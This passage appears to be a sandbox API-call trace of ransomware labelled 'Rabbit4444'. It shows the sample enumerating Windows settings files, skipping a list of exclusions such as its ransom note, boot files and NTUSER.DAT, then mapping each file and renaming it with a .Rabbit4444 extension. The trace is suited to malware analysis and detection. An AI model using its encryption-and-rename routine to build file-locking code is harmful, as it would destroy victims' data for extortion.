lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms") returned="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms" [0058.449] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.449] lstrlenW (lpString="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms") returned 64 [0058.449] lstrlenW (lpString="Rabbit4444") returned 10 [0058.449] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.449] lstrlenW (lpString=".dll") returned 4 [0058.449] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.449] lstrlenW (lpString=".lnk") returned 4 [0058.449] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.449] lstrlenW (lpString=".ini") returned 4 [0058.449] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.450] lstrlenW (lpString=".sys") returned 4 [0058.450] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1bdb99df-3832-49d6-9ae0-52105db568da}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.450] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.450] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14976062337) returned 1 [0058.450] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=970) returned 1 [0058.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.450] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.451] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.453] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14976339780) returned 1 [0058.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.453] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.453] CloseHandle (hObject=0x298) returned 1 [0058.453] CloseHandle (hObject=0x278) returned 1 [0058.453] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms.Rabbit4444") returned 192 [0058.453] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1bdb99df-3832-49d6-9ae0-52105db568da}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1bdb99df-3832-49d6-9ae0-52105db568da}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.454] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46256b9c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x46256b9c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", cAlternateFileName="CL9950~1.SET")) returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2=".") returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="..") returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="windows") returned -1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="boot") returned 1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.454] lstrcmpiW (lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.454] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms" | out: lpString1="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms") returned="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms" [0058.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.455] lstrlenW (lpString="Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms") returned 64 [0058.455] lstrlenW (lpString="Rabbit4444") returned 10 [0058.455] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.455] lstrlenW (lpString=".dll") returned 4 [0058.455] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.455] lstrlenW (lpString=".lnk") returned 4 [0058.455] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.455] lstrlenW (lpString=".ini") returned 4 [0058.455] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.455] lstrlenW (lpString=".sys") returned 4 [0058.455] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1dd03ee3-fc46-456a-8632-b0717a9d497d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.455] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.455] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14976601268) returned 1 [0058.455] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1249) returned 1 [0058.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.455] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0058.456] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0058.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.458] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14976848929) returned 1 [0058.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.458] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.458] CloseHandle (hObject=0x298) returned 1 [0058.458] CloseHandle (hObject=0x278) returned 1 [0058.458] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms.Rabbit4444") returned 192 [0058.458] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1dd03ee3-fc46-456a-8632-b0717a9d497d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1dd03ee3-fc46-456a-8632-b0717a9d497d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.459] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46387e6f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x46387e6f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", cAlternateFileName="CL3A25~1.SET")) returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2=".") returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="..") returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="windows") returned -1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="boot") returned 1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.459] lstrcmpiW (lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.459] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms" | out: lpString1="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms") returned="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms" [0058.459] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.459] lstrlenW (lpString="Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms") returned 64 [0058.459] lstrlenW (lpString="Rabbit4444") returned 10 [0058.460] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.460] lstrlenW (lpString=".dll") returned 4 [0058.460] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.460] lstrlenW (lpString=".lnk") returned 4 [0058.460] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.460] lstrlenW (lpString=".ini") returned 4 [0058.460] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.460] lstrlenW (lpString=".sys") returned 4 [0058.460] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{201cef4b-7444-4b2f-b885-5e8f0aa1d614}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.460] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.460] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14977079910) returned 1 [0058.460] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1206) returned 1 [0058.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.460] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.462] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.464] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14977451203) returned 1 [0058.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.464] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.464] CloseHandle (hObject=0x298) returned 1 [0058.464] CloseHandle (hObject=0x278) returned 1 [0058.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms.Rabbit4444") returned 192 [0058.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{201cef4b-7444-4b2f-b885-5e8f0aa1d614}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{201cef4b-7444-4b2f-b885-5e8f0aa1d614}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.465] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x464b9146, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x464b9146, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", cAlternateFileName="CL41C5~1.SET")) returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2=".") returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="..") returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="windows") returned -1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="boot") returned 1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.465] lstrcmpiW (lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.465] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms" | out: lpString1="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms") returned="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms" [0058.465] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.466] lstrlenW (lpString="Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms") returned 64 [0058.466] lstrlenW (lpString="Rabbit4444") returned 10 [0058.466] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.466] lstrlenW (lpString=".dll") returned 4 [0058.466] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.466] lstrlenW (lpString=".lnk") returned 4 [0058.466] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.466] lstrlenW (lpString=".ini") returned 4 [0058.466] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.466] lstrlenW (lpString=".sys") returned 4 [0058.466] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{207d6bd2-a09b-406f-8a72-bc90c49fc152}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14977699843) returned 1 [0058.466] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1512) returned 1 [0058.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.466] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8f0, lpName=0x0) returned 0x298 [0058.468] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f0) returned 0x70000 [0058.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 